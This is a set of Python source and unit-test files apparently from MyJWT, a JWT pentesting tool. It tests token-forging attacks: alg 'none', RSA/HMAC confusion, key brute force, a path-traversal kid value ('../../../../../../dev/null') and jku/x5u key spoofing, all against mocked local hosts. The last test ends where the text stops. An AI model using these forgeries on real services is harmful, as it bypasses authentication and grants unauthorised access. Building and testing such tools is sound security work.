import os
import OpenSSL
import requests_mock

from unittest import TestCase

from MyJWT.Exception import InvalidJWT
from MyJWT.utils import HEADER, SIGNATURE, PAYLOAD, jwtToJson, createCrt
from MyJWT.vulnerabilities import (
    noneVulnerability,
    confusionRsaHmac,
    bruteforceDict,
    injectSqlKid,
    printDecoded,
    sendJwtToUrl,
    jkuVulnerability, x5uVulnerability)


class TestVulnerabilities(TestCase):
    def setUp(self):
        self.jwt = (
            "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJsb2dpbiI6ImEifQ.Fjziy6GSQpP9tQRyko5APZjdymkQ8EJGOa"
            "-A2JQ6xcAVucXRhZbdBbAM2DG8io_brP_ROAqYaNlvRVsztXoPHFz_e7D2K0q6f02RXeRwZJGOhy0K"
            "-Oj9Z1UmFJWqVpAAafN75w7OKoSRh6BtQfH8XDleqwpVoywCuWFdYrSbqBoVskRQkp8H-HUC5XmN5om4"
            "-NdiQkiKa7OFQ6Hoklclz9_WD5rc"
            "-HWJp3rJW4EIHzOPfs1GuDuhtIRu0uuRYp4vvzLZcVm0BhlK9e_fmFcbsTz3MwVHIeFEIx2NjQdhE"
            "-CefQ4tNg6Rr6OtgGExToUfD0i0mAoAhTcvmoyO6c2paQ"
        )
        self.jwtBruteForce = (
            "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjpudWxsfQ"
            ".Tr0VvdP6rVBGBGuI_luxGCOaz6BbhC6IxRTlKOW8UjM"
        )
        self.jwtKid = (
            "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6ImtleTEifQ.eyJ1c2VyIjpudWxsfQ"
            ".2B9ZKzJ3FeJ9yoNLDGKgcxOuo05PwDRzFQ_34CrGteQ"
        )
        self.jwtJku = (
            "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MCJ9.eyJ1c2VyIjoiYSJ9"
            ".e1oZ73Q95aYPcRfulEY--beuGEV2tE1W_FGHtH1ZlevC76lBVqbdM5PY1v6quuJWRtNLwqDbUdydAH4lubgE0pwix-A7LqcD-b"
            "-0mNQkt9jXqBYCYBsZtGnvBFB9qHoK_CI39qLku1rOWkcEOcJYMSJFfxipImBb_AwoiXv"
            "-wmnpchTOAY_PFOtXVXKHkoGQtEaMKfnRBXHAgyEAcqHCqvljWuMmdKVpyGNVaQBnKCEKkGyYLpdpL2UIZ3XNYy96JcGpm6LHvIXm6r"
            "EOkWoJl2j_07xVsM2S__QzllRw_qezS5rzuYlRz-0j0nP_S5gSRcdrR4yNtSO3ivue5mR-RQ"
        )
        self.jwtX5u = (
            "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dSI6Imh0dHA6Ly90ZXN0LmNvbSJ9.eyJ1c2VyIjoiaGFja2VyIn0.Z57BGf-BW"
            "WGCYGRST3PstC7dqFVxLpYh8D9iy6z8_tpz8vIESa5IdLt3hkM8ysB0IjrkWbgNMYTaP7YiGpHG7MhF_IAc_q8HOilMtvrVTyJ0EpE3uJ"
            "okXZSh_hhU5ay2K8H743AG_5x7coAf7ZsNe_rnSuDN6iV_oXo31H2ga9VMk2BLgvqFLYgIYVETeQbcSx4M2rxiH20VbqO4dwzYDedYkD"
            "AHKGHUAI0eXJoJ7Sq3sDrjZ9_THTiHSwQQYFnlIbIcFKuANdExuhG-tmIhfa6-8Zu_RELLL6UzgL2G-yu021B_Hm9YmwuXewtDktXKY"
            "uWofo-PVFUUWVSEw7gIAw"
        )
        self.key = "pentesterlab"
        self.path = "./examples/05-rsa-hmac-confusion/public.pem"
        self.password = "./wordlist/common_pass.txt"
        self.signature = "KJDuTWSj9wa3NL3j1u2HOijvgu-oO9tBjKGxjo_qdXQ"
        self.injection = "../../../../../../dev/null"

    def testNoneVulnerability(self):
        with self.assertRaises(InvalidJWT):
            noneVulnerability("")

        newJwt = noneVulnerability(self.jwt)
        jwtJson = jwtToJson(self.jwt)
        newJwtJson = jwtToJson(newJwt)

        self.assertEqual(jwtJson[PAYLOAD], newJwtJson[PAYLOAD])
        self.assertEqual(newJwtJson[HEADER]["alg"], "none")
        self.assertEqual(newJwtJson[SIGNATURE], "")

    def testConfusionRsaHmac(self):
        with self.assertRaises(InvalidJWT):
            confusionRsaHmac("", self.path)

        newJwt = confusionRsaHmac(self.jwt, self.path)
        jwtJson = jwtToJson(self.jwt)
        newJwtJson = jwtToJson(newJwt)

        self.assertEqual(jwtJson[PAYLOAD], newJwtJson[PAYLOAD])
        self.assertEqual(newJwtJson[HEADER]["alg"], "HS256")
        self.assertEqual(newJwtJson[SIGNATURE], self.signature)

    def testBruteForceDict(self):
        with self.assertRaises(InvalidJWT):
            bruteforceDict("", self.password)

        key = bruteforceDict(self.jwtBruteForce, self.password)
        self.assertEqual(key, self.key)

        key = bruteforceDict(self.jwtBruteForce, "./wordlist/empty.txt")
        self.assertEqual(key, "")

    def testInjectSqlKid(self):
        with self.assertRaises(InvalidJWT):
            injectSqlKid("", self.injection)

        jwt = injectSqlKid(self.jwtKid, self.injection)
        self.assertEqual(jwtToJson(jwt)[HEADER]["kid"], self.injection)

    def testPrintDecoded(self):
        with self.assertRaises(InvalidJWT):
            printDecoded("")
        printDecoded(self.jwtBruteForce)

    @requests_mock.mock()
    def testSendJwtToUrl(self, m):
        status_code = 200
        m.get("http://localhost:8080", json={}, status_code=status_code)

        response = sendJwtToUrl(
            "http://localhost:8080",
            "GET",
            {"data": "data"},
            {"cookie": "cookie"},
            "test",
        )
        self.assertEqual(response.request.method, "GET")
        self.assertEqual(response.request.json(), {"data": "data"})

        status_code = 200
        m.post("http://localhost:8080", json={}, status_code=status_code)
        response = sendJwtToUrl(
            "http://localhost:8080",
            "POST",
            {"data": "data"},
            {"cookie": "cookie"},
            "test",
        )
        self.assertEqual(response.request.method, "POST")
        self.assertEqual(response.request.json(), {"data": "data"})
        self.assertEqual(response.request.headers["Authorization"], "Bearer test")

    @requests_mock.mock()
    def testJkuVulnerability(self, m):
        with self.assertRaises(InvalidJWT):
            jkuVulnerability("", "http://test.com")

        with self.assertRaises(InvalidJWT):
            jkuVulnerability(self.jwtBruteForce, "http://test.com")

        status_code = 200
        m.get("http://localhost:8080", json={
            "keys": [
                {
                    "kty": "RSA",
                    "use": "sig",
                    "kid": "xxxxxxxxx",
                    "n": "oTtAXRgdJ6Pu0jr3hK3opCF5uqKWKbm4KkqIiDJSEsQ4PnAz14P_aJnfnsQwgchFGN95cfCO7euC8HjT"
                         "-u5WHHDn08GQ7ot6Gq6j-fbwMdRWjLC74XqQ0JNDHRJoM4bbj4i8FaBdYKvKmnJ8eSeEjA0YrG8KuTOPbLsgl"
                         "ADUubNw9kggRIvj6au88dnBJ9HeZ27QVVFaIllZpMITtocuPkOKd8bHzkZzKN4HJtM0hgzOjeyCfqZxh1V8LybliWD"
                         "XYivUqmvrzchzwXTAQPJBBfYo9BO6D4Neui8rGbc49OBCnHLCWtPH7m7xp3cz-PbVnLhRczzsQE_3escvTF0FGw",
                    "e": "AQAB",
                    "alg": "RS256"
                }
            ]
        }, status_code=status_code)
        jwt = jkuVulnerability(self.jwtJku, "http://test.com")
        jwtJson = jwtToJson(jwt)
        self.assertIn("jku", jwtJson[HEADER])
        self.assertTrue(os.path.exists("jwk-python.json"))
        self.assertTrue(jwtJson[HEADER]["jku"], "http://test.com/jwk-python.json")

        jwt = jkuVulnerability(self.jwtJku, "http://test.com", file="test")
        jwtJson = jwtToJson(jwt)
        self.assertIn("jku", jwtJson[HEADER])
        self.assertTrue(os.path.exists("test.json"))
        self.assertTrue(jwtJson[HEADER]["jku"], "http://test.com/test.json")

        privatekey = OpenSSL.crypto.PKey()
        privatekey.generate_key(OpenSSL.crypto.TYPE_RSA, 4096)

        with open('private.pem', 'w') as f:
            f.write(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, privatekey).decode())

        jkuVulnerability(self.jwtJku, "http://test.com", file="test", pem="private.pem")
        self.assertTrue(os.path.exists("private.pem"))

    @requests_mock.mock()
    def testX5uVulnerability(self, m):
        with self.assertRaises(InvalidJWT):
            x5uVulnerability("", url="http://test.com")

        with self.assertRaises(InvalidJWT):
            x5uVulnerability(self.jwtBruteForce, url="http://test.com")

        status_code = 200
        m.get("http://test.com", json={
            "keys": [
                {
                    "kty": "RSA",
                    "use": "sig",
                    "kid": "xxxxxxxxx",
                    "n": "oTtAXRgdJ6Pu0jr3hK3opCF5uqKWKbm4KkqIiDJSEsQ4PnAz14P_aJnfnsQwgchFGN95cfCO7euC8HjT"
                         "-u5WHHDn08GQ7ot6Gq6j-fbwMdRWjLC74XqQ0JNDHRJoM4bbj4i8FaBdYKvKmnJ8eSeEjA0YrG8KuTOPbLsgl"
                         "ADUubNw9kggRIvj6au88dnBJ9HeZ27QVVFaIllZpMITtocuPkOKd8bHzkZzKN4HJtM0hgzOjeyCfqZxh1V8LybliWD"
                         "XYivUqmvrzchzwXTAQPJBBfYo9BO6D4Neui8rGbc49OBCnHLCWtPH7m7xp3cz-PbVnLhRczzsQE_3escvTF0FGw",
                    "e": "AQAB",
                    "alg": "RS256"
                }
            ]
        }, status_code=status_code)
        jwt = x5uVulnerability(self.jwtX5u, url="http://test.com/jwks_with_x5c.json")
        jwtJson = jwtToJson(jwt)
        self.assertIn("x5u", jwtJson[HEADER])
        self.assertTrue(os.path.exists("jwks_with_x5c.json"))
        self.assertTrue(jwtJson[HEADER]["x5u"], "http://test.com/jwks_with_x5c.json")

        createCrt()

        x5uVulnerability(self.jwtX5u, url="http://test.com", crt="selfsigned.crt", pem="private.pem")
        self.assertTrue(os.path.exists("private.pem"))
        self.assertTrue(os.path.exists("selfsigned.crt"))



"""
All Environment variables
"""
VERSION = "1.1.2"

NOT_VALID_JWT = "Enter a valid JWT!!!"
CHECK_DOCS = "Check Docs!!Your jwt have not a HS alg."
NOT_CRAKED = "JWT not cracked sorry. :'("
CRACKED = "JWT cracked, key is: "
VALID_PAYLOAD = "Enter a Valid payload, Format: username=admin"
VALID_COOKIES = "Enter a Valid cookie, Format: username=admin"
VALID_DATA = "Enter a Valid data, Format: username=admin"
VALID_HEADER = "Enter a Valid header, Format: username=admin"
VALID_PAYLOAD_JSON = "Not a valid format for payload, send a json."
NEW_JWT = "new JWT: "
VALID_SIGNATURE = "Valid Signature!!"
INVALID_SIGNATURE = "Incorrect signature!!"



import os
from unittest import TestCase

from MyJWT.Exception import InvalidJWT, InvalidJwtJson
from MyJWT.utils import (
    jwtToJson,
    encodedToJson,
    encodeJwt,
    isValidJwt,
    isValidJwtJson,
    HEADER,
    PAYLOAD,
    SIGNATURE,
    createCrt)


class TestUtils(TestCase):
    def setUp(self):
        self.invalidJWT = "test.test"
        self.jwt = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJsb2dpbiI6ImF6In0."
        self.encodedString = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0"
        self.header = {"typ": "JWT", "alg": "none"}
        self.payload = {"login": "az"}
        self.signature = ""
        self.jwtJson = {
            HEADER: self.header,
            PAYLOAD: self.payload,
            SIGNATURE: self.signature,
        }

    def testJwtToJsonInvalidJWT(self):
        with self.assertRaises(InvalidJWT):
            jwtToJson(self.invalidJWT)

    def testJwtToJson(self):
        jwtJson = jwtToJson(self.jwt)
        self.assertIsInstance(jwtJson, dict)

        self.assertListEqual(list(jwtJson.keys()), [HEADER, PAYLOAD, SIGNATURE])

        self.assertEqual(jwtJson[HEADER], self.header)
        self.assertEqual(jwtJson[PAYLOAD], self.payload)
        self.assertEqual(jwtJson[SIGNATURE], "")

    def testEncodedToJson(self):
        jsonDecoded = encodedToJson(self.encodedString)

        self.assertIsInstance(jsonDecoded, dict)
        self.assertEqual(jsonDecoded, self.header)

    def testEncodeJwt(self):
        with self.assertRaises(InvalidJwtJson):
            encodeJwt({})

        jwt = encodeJwt(self.jwtJson)
        self.assertEqual(jwt + ".", self.jwt)

    def testIsvalidJwt(self):
        self.assertTrue(isValidJwt(self.jwt))

    def testIsValidJwtJson(self):
        self.assertTrue(isValidJwtJson(self.jwtJson))

    def testCreatCrt(self):
        createCrt()
        self.assertTrue(os.path.exists("selfsigned.crt"))
        self.assertTrue(os.path.exists("private.pem"))



"""
Utils package
"""
import base64
import json

from OpenSSL import crypto

from MyJWT.Exception import InvalidJWT, InvalidJwtJson

HEADER = "header"
PAYLOAD = "payload"
SIGNATURE = "signature"


def jwtToJson(jwt):
    """
    Transform your jwt string to a dict.

    :param str jwt: your jwt.
    :return: a dict with key: header with value base64_decode(header), payload with value base64_decode(payload), and signature with value signature.
    :rtype: dict

    :raise InvalidJWT: if your jwt is not valid
    """
    if not isValidJwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwtSplit = jwt.split(".")
    header = jwtSplit[0]
    payload = jwtSplit[1]
    signature = jwtSplit[2]
    headerJson = encodedToJson(header)
    payloadJson = encodedToJson(payload)
    return {HEADER: headerJson, PAYLOAD: payloadJson, SIGNATURE: signature}


def encodedToJson(encodedString):
    """
    Transform your encoded string to dict
    :param str encodedString: your string base64 encoded
    :return: dict.
    :rtype: dict
    """
    decode = base64.b64decode(encodedString + "=" * (-len(encodedString) % 4))
    return json.loads(decode)


def encodeJwt(jwtJson):
    """
    Transform your json to jwt without signature.

    :param dict jwtJson: dict with key header, payload.
    :return: jwt string encoded
    :rtype: str
    """
    if not isValidJwtJson(jwtJson):
        raise InvalidJwtJson("Invalid JWT json format")
    headerEncoded = (
        base64.urlsafe_b64encode(
            json.dumps(jwtJson[HEADER], separators=(",", ":")).encode("UTF-8")
        ).decode("UTF-8").strip("=")
    )
    payloadEncoded = (
        base64.urlsafe_b64encode(
            json.dumps(jwtJson[PAYLOAD], separators=(",", ":")).encode("UTF-8")
        ).decode("UTF-8").strip("=")
    )
    return headerEncoded + "." + payloadEncoded


def isValidJwt(jwt):
    """
    Check jwt.

    :param jwt: jwt string
    :return: True if jwt is valid , False else
    :rtype: bool
    """
    return len(jwt.split(".")) == 3


def isValidJwtJson(jwtJson):
    """
    Check jwtJson.

    :param jwtJson: dict
    :return: True if jwtJson is valid , False else
    :rtype: bool
    """
    return HEADER in jwtJson \
           and PAYLOAD in jwtJson \
           and SIGNATURE in jwtJson \
           and type(jwtJson[HEADER]) is dict \
           and type(jwtJson[PAYLOAD]) is dict \
           and type(jwtJson[SIGNATURE]) is str


def createCrt():
    """
    Create crt + pem
    :return: crt, pem
    :rtype: str, str
    """
    k = crypto.PKey()
    k.generate_key(crypto.TYPE_RSA, 2048)
    # create a self-signed cert
    cert = crypto.X509()
    cert.get_subject().C = "AU"
    cert.get_subject().ST = "Victoria"
    cert.get_subject().L = "Melbourne"
    cert.get_subject().O = "MyJWT"
    cert.get_subject().CN = "hacker"
    cert.gmtime_adj_notBefore(0)
    cert.gmtime_adj_notAfter(365 * 24 * 60 * 60)
    cert.set_issuer(cert.get_subject())
    cert.set_pubkey(k)
    cert.sign(k, "sha256")
    crt = "selfsigned.crt"
    pem = "private.pem"
    with open("selfsigned.crt", "wt") as f:
        f.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode("utf-8"))
        f.close()
    with open("private.pem", "wt") as f:
        f.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode("utf-8"))
        f.close()
    return crt, pem



"""
Package for modify your jwt(header, payload, signature)
"""
import base64
import hashlib
import hmac

from MyJWT.Exception import InvalidJwtJson, InvalidParam, UnknownAlg
from MyJWT.utils import encodeJwt, isValidJwtJson, PAYLOAD, HEADER


def addpayload(jwtJson, payload):
    """
    Add new key:value to jwt's payload.

    :param dict jwtJson: your jwt json (use encodeToJson.Check Doc)
    :param dict payload: add value to your payload
    :return: dict JWT
    :rtype: dict

    :raise: InvalidJwtJson if your jwtJson is not a dict.
    :raise: InvalidParam if your payload is not a dict.
    """
    if not isValidJwtJson(jwtJson):
        raise InvalidJwtJson("Invalid JWT json format")

    if type(payload) is not dict:
        raise InvalidParam("Invalid Payload")

    for payloadKey in payload.keys():
        jwtJson[PAYLOAD][payloadKey] = payload[payloadKey]
    return jwtJson


def addheader(jwtJson, header):
    """
    Add new key:value to jwt's header.

    :param dict jwtJson: your jwt json (use encodeToJson.Check Doc)
    :param dict header: add value to your header
    :return: dict JWT
    :rtype: dict

    :raise: InvalidJwtJson if your jwtJson is not a dict.
    :raise: InvalidParam if your header is not a dict.
    """
    if not isValidJwtJson(jwtJson):
        raise InvalidJwtJson("Invalid JWT json format")

    if type(header) is not dict:
        raise InvalidParam("Invalid Header")

    for headerKey in header.keys():
        jwtJson[HEADER][headerKey] = header[headerKey]
    return jwtJson


def changeAlg(jwtJson, algo):
    """
    Change alg of your jwt

    :param dict jwtJson: your jwt json (use encodeToJson.Check Doc)
    :param str algo: new algo
    :return: dict JWT
    :rtype: dict

    :raise: InvalidJwtJson if your jwtJson is not a dict.
    """
    if not isValidJwtJson(jwtJson):
        raise InvalidJwtJson("Invalid JWT json format")

    jwtJson[HEADER]["alg"] = algo
    return jwtJson


def changePayload(jwtJson, payload):
    """
    Change payload to your jwtJson

    :param dict jwtJson: your jwt json (use encodeToJson.Check Doc)
    :param dict payload: new payload
    :return: dict JWT
    :rtype: dict

    :raise: InvalidJwtJson if your jwtJson is not a dict.
    """
    if not isValidJwtJson(jwtJson):
        raise InvalidJwtJson("Invalid JWT json format")
    jwtJson[PAYLOAD] = payload
    return jwtJson


def signature(jwtJson, key):
    """
    Sign your jwt.

    :param dict jwtJson: your jwt json (use encodeToJson.Check Doc)
    :param str key: new payload
    :return: jwt encoded
    :rtype: str

    :raise: InvalidJwtJson if your jwtJson is not a dict.
    :raise: UnknownAlg if your algo is not know.
    """
    if not isValidJwtJson(jwtJson):
        raise InvalidJwtJson("Invalid JWT json format")

    if jwtJson[HEADER]["alg"] == "none":
        return encodeJwt(jwtJson) + "."
    elif jwtJson[HEADER]["alg"] == "HS256":
        jwt = encodeJwt(jwtJson)
        signature = hmac.new(key.encode(), jwt.encode(), hashlib.sha256).digest()
        newSig = base64.urlsafe_b64encode(signature).decode("UTF-8").strip("=")
        return jwt + "." + newSig
    elif jwtJson[HEADER]["alg"] == "HS384":
        jwt = encodeJwt(jwtJson)
        signature = hmac.new(key.encode(), jwt.encode(), hashlib.sha384).digest()
        newSig = base64.urlsafe_b64encode(signature).decode("UTF-8").strip("=")
        return jwt + "." + newSig
    elif jwtJson[HEADER]["alg"] == "HS512":
        jwt = encodeJwt(jwtJson)
        signature = hmac.new(key.encode(), jwt.encode(), hashlib.sha512).digest()
        newSig = base64.urlsafe_b64encode(signature).decode("UTF-8").strip("=")
        return jwt + "." + newSig

    raise UnknownAlg("Unknown alg " + jwtJson[HEADER]["alg"] + "send an issue please.")



import json
import re
from unittest import TestCase
from unittest.mock import patch

import requests
import requests_mock
from click.testing import CliRunner

from MyJWT.modifyJWT import changePayload
from MyJWT.utils import jwtToJson, HEADER, PAYLOAD, SIGNATURE
from MyJWT.variables import (
    NOT_VALID_JWT,
    VALID_PAYLOAD_JSON,
    NEW_JWT,
    VALID_SIGNATURE,
    CHECK_DOCS,
    NOT_CRAKED,
    CRACKED,
)
from MyJWT.myjwt_cli import myjwt_cli


class TestMain(TestCase):
    def setUp(self):
        self.jwt = (
            "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJsb2dpbiI6ImEifQ.Fjziy6GSQpP9tQRyko5APZjdymkQ8EJGOa"
            "-A2JQ6xcAVucXRhZbdBbAM2DG8io_brP_ROAqYaNlvRVsztXoPHFz_e7D2K0q6f02RXeRwZJGOhy0K"
            "-Oj9Z1UmFJWqVpAAafN75w7OKoSRh6BtQfH8XDleqwpVoywCuWFdYrSbqBoVskRQkp8H-HUC5XmN5om4"
            "-NdiQkiKa7OFQ6Hoklclz9_WD5rc"
            "-HWJp3rJW4EIHzOPfs1GuDuhtIRu0uuRYp4vvzLZcVm0BhlK9e_fmFcbsTz3MwVHIeFEIx2NjQdhE"
            "-CefQ4tNg6Rr6OtgGExToUfD0i0mAoAhTcvmoyO6c2paQ"
        )
        self.runner = CliRunner()
        self.jwtBruteForce = (
            "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjpudWxsfQ"
            ".Tr0VvdP6rVBGBGuI_luxGCOaz6BbhC6IxRTlKOW8UjM"
        )
        self.password = "./wordlist/common_pass.txt"
        self.jwtKid = (
            "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6ImtleTEifQ.eyJ1c2VyIjpudWxsfQ"
            ".2B9ZKzJ3FeJ9yoNLDGKgcxOuo05PwDRzFQ_34CrGteQ"
        )
        self.injection = "../../../../../../dev/null"

        self.jwtJku = (
            "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MCJ9.eyJ1c2VyIjoiYSJ9"
            ".e1oZ73Q95aYPcRfulEY--beuGEV2tE1W_FGHtH1ZlevC76lBVqbdM5PY1v6quuJWRtNLwqDbUdydAH4lubgE0pwix-A7LqcD-b"
            "-0mNQkt9jXqBYCYBsZtGnvBFB9qHoK_CI39qLku1rOWkcEOcJYMSJFfxipImBb_AwoiXv"
            "-wmnpchTOAY_PFOtXVXKHkoGQtEaMKfnRBXHAgyEAcqHCqvljWuMmdKVpyGNVaQBnKCEKkGyYLpdpL2UIZ3XNYy96JcGpm6LHvIXm6r"
            "EOkWoJl2j_07xVsM2S__QzllRw_qezS5rzuYlRz-0j0nP_S5gSRcdrR4yNtSO3ivue5mR-RQ"
        )

        self.jwtX5u = (
            "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dSI6Imh0dHA6Ly90ZXN0LmNvbSJ9.eyJ1c2VyIjoiaGFja2VyIn0.Z57BGf-BW"
            "WGCYGRST3PstC7dqFVxLpYh8D9iy6z8_tpz8vIESa5IdLt3hkM8ysB0IjrkWbgNMYTaP7YiGpHG7MhF_IAc_q8HOilMtvrVTyJ0EpE3uJ"
            "okXZSh_hhU5ay2K8H743AG_5x7coAf7ZsNe_rnSuDN6iV_oXo31H2ga9VMk2BLgvqFLYgIYVETeQbcSx4M2rxiH20VbqO4dwzYDedYkD"
            "AHKGHUAI0eXJoJ7Sq3sDrjZ9_THTiHSwQQYFnlIbIcFKuANdExuhG-tmIhfa6-8Zu_RELLL6UzgL2G-yu021B_Hm9YmwuXewtDktXKY"
            "uWofo-PVFUUWVSEw7gIAw"
        )

    def testErrorCli(self):
        result = self.runner.invoke(myjwt_cli, [])
        self.assertEqual(result.exit_code, 2)

        result = self.runner.invoke(myjwt_cli, ["Peter"])
        self.assertIn(NOT_VALID_JWT, result.output)
        self.assertEqual(result.exit_code, 1)

        result = self.runner.invoke(myjwt_cli, [self.jwt])
        self.assertEqual(result.exit_code, 0)

    def testPayload(self):
        result = self.runner.invoke(myjwt_cli, [self.jwt, "--full-payload"])
        self.assertEqual(result.exit_code, 2)

        result = self.runner.invoke(myjwt_cli, [self.jwt, "--full-payload", "test"])
        self.assertIn(VALID_PAYLOAD_JSON, result.output)

        result = self.runner.invoke(
            myjwt_cli,
            [self.jwt, "--full-payload", '{"username": "test", "password": "test"}'],
        )
        jwtVerify = changePayload(
            jwtToJson(self.jwt), json.loads('{"username": "test", "password": "test"}')
        )
        jwt = re.search(NEW_JWT + "(.*)", result.output).groups()[0]
        self.assertEqual(jwtToJson(jwt), jwtVerify)
        self.assertEqual(result.exit_code, 0)

    def testAddHeader(self):
        result = self.runner.invoke(myjwt_cli, [self.jwt, "--add-header"])
        self.assertEqual(result.exit_code, 2)

        result = self.runner.invoke(myjwt_cli, [self.jwt, "--add-header", "admin"])
        self.assertEqual(result.exit_code, 1)

        result = self.runner.invoke(
            myjwt_cli, [self.jwt, "--add-header", "username=admin"]
        )
        jwt = re.search(NEW_JWT + "(.*)", result.output).groups()[0]
        jwtJson = jwtToJson(jwt)
        self.assertEqual(jwtJson[HEADER]["username"], "admin")
        self.assertEqual(result.exit_code, 0)

    def testAddPayload(self):
        result = self.runner.invoke(myjwt_cli, [self.jwt, "--add-payload"])
        self.assertEqual(result.exit_code, 2)

        result = self.runner.invoke(myjwt_cli, [self.jwt, "--add-payload", "admin"])
        self.assertEqual(result.exit_code, 1)

        result = self.runner.invoke(
            myjwt_cli, [self.jwt, "--add-payload", "username=admin"]
        )
        jwt = re.search(NEW_JWT + "(.*)", result.output).groups()[0]
        jwtJson = jwtToJson(jwt)
        self.assertEqual(jwtJson[PAYLOAD]["username"], "admin")
        self.assertEqual(result.exit_code, 0)

    def testSign(self):
        result = self.runner.invoke(myjwt_cli, [self.jwt, "--sign"])
        self.assertEqual(result.exit_code, 2)

        result = self.runner.invoke(myjwt_cli, [self.jwt, "--sign", "test"])
        self.assertEqual(result.exit_code, 1)

        result = self.runner.invoke(
            myjwt_cli, [self.jwtBruteForce, "--sign", "pentesterlab"]
        )
        jwt = re.search(NEW_JWT + "(.*)", result.output).groups()[0]
        self.assertEqual(self.jwtBruteForce, jwt)
        self.assertEqual(result.exit_code, 0)

    def testVerify(self):
        result = self.runner.invoke(myjwt_cli, [self.jwt, "--verify"])
        self.assertEqual(result.exit_code, 2)

        result = self.runner.invoke(myjwt_cli, [self.jwt, "--verify", "test"])
        self.assertEqual(result.exit_code, 1)

        result = self.runner.invoke(
            myjwt_cli, [self.jwtBruteForce, "--verify", "pentesterlab"]
        )
        self.assertIn(VALID_SIGNATURE, result.output)
        self.assertEqual(result.exit_code, 0)

    def testNoneVulnerability(self):
        result = self.runner.invoke(myjwt_cli, [self.jwt, "--none-vulnerability"])
        jwt = re.search(NEW_JWT + "(.*)", result.output).groups()[0]
        self.assertEqual("none", jwtToJson(jwt)[HEADER]["alg"])
        self.assertEqual("", jwtToJson(jwt)[SIGNATURE])
        self.assertEqual(result.exit_code, 0)

    def testHmac(self):
        result = self.runner.invoke(myjwt_cli, [self.jwt, "--hmac"])
        self.assertEqual(result.exit_code, 2)

        result = self.runner.invoke(
            myjwt_cli,
            [self.jwt, "--hmac", "./examples/05-rsa-hmac-confusion/public.pem"],
        )
        self.assertEqual(result.exit_code, 0)

    def testBruteForceCli(self):
        result = self.runner.invoke(myjwt_cli, [self.jwt, "--bruteforce", "azdzd"])
        self.assertEqual(result.exit_code, 2)

        result = self.runner.invoke(
            myjwt_cli, [self.jwt, "--bruteforce", self.password]
        )
        self.assertIn(CHECK_DOCS, result.output)
        self.assertEqual(result.exit_code, 1)

        result = self.runner.invoke(
            myjwt_cli, [self.jwtBruteForce, "--bruteforce", "./wordlist/empty.txt"]
        )
        self.assertIn(NOT_CRAKED, result.output)
        self.assertEqual(result.exit_code, 1)

        result = self.runner.invoke(
            myjwt_cli, [self.jwtBruteForce, "--bruteforce", self.password]
        )
        self.assertIn(CRACKED + "pentesterlab", result.output)
        self.assertEqual(result.exit_code, 0)

    def testKid(self):
        result = self.runner.invoke(myjwt_cli, [self.jwt, "--kid"])
        self.assertEqual(result.exit_code, 2)

        result = self.runner.invoke(myjwt_cli, [self.jwtKid, "--kid", self.injection])
        self.assertEqual(result.exit_code, 0)

    def testPrint(self):
        result = self.runner.invoke(myjwt_cli, [self.jwt, "--print"])
        self.assertEqual(result.exit_code, 0)

    @requests_mock.mock()
    def testUrl(self, m):
        status_code = 200
        m.get("http://localhost:8080", json={}, status_code=status_code)

        result = self.runner.invoke(
            myjwt_cli,
            [
                self.jwt,
                "-u",
                "http://localhost:8080",
                "-c",
                "data=data",
                "-d",
                "data=data",
            ],
        )
        self.assertEqual(result.exit_code, 0)

        result = self.runner.invoke(
            myjwt_cli, [self.jwt, "-u", "http://localhost:8080", "-c", "data"]
        )
        self.assertEqual(result.exit_code, 1)

        result = self.runner.invoke(
            myjwt_cli, [self.jwt, "-u", "http://localhost:8080", "-d", "data"]
        )
        self.assertEqual(result.exit_code, 1)

        result = self.runner.invoke(
            myjwt_cli, [self.jwt, "-u", "http://localhost:8080", "-d", "data=MY_JWT"]
        )
        self.assertEqual(result.exit_code, 0)

        result = self.runner.invoke(
            myjwt_cli, [self.jwt, "-u", "http://localhost:8080", "-c", "data=MY_JWT"]
        )
        self.assertEqual(result.exit_code, 0)

    @patch("MyJWT.vulnerabilities.sendJwtToUrl")
    def testUrlConnectionError(self, m):
        m.side_effect = requests.exceptions.ConnectionError
        result = self.runner.invoke(myjwt_cli, [self.jwt, '-u', "http://www.azdazdazdzadazdazdzad.com"])
        self.assertIn('Connection Error. Verify your url', result.output)
        self.assertEqual(result.exit_code, 1)

    @requests_mock.mock()
    def testJku(self, m):
        status_code = 200
        m.get("http://localhost:8080", json={
            "keys": [
                {
                    "kty": "RSA",
                    "use": "sig",
                    "kid": "xxxxxxxxx",
                    "n": "oTtAXRgdJ6Pu0jr3hK3opCF5uqKWKbm4KkqIiDJSEsQ4PnAz14P_aJnfnsQwgchFGN95cfCO7euC8HjT"
                         "-u5WHHDn08GQ7ot6Gq6j-fbwMdRWjLC74XqQ0JNDHRJoM4bbj4i8FaBdYKvKmnJ8eSeEjA0YrG8KuTOPbLsgl"
                         "ADUubNw9kggRIvj6au88dnBJ9HeZ27QVVFaIllZpMITtocuPkOKd8bHzkZzKN4HJtM0hgzOjeyCfqZxh1V8LybliWD"
                         "XYivUqmvrzchzwXTAQPJBBfYo9BO6D4Neui8rGbc49OBCnHLCWtPH7m7xp3cz-PbVnLhRczzsQE_3escvTF0FGw",
                    "e": "AQAB",
                    "alg": "RS256"
                }
            ]
        }, status_code=status_code)

        result = self.runner.invoke(
            myjwt_cli, [self.jwtJku, "--jku", "http://localhost:8080"]
        )
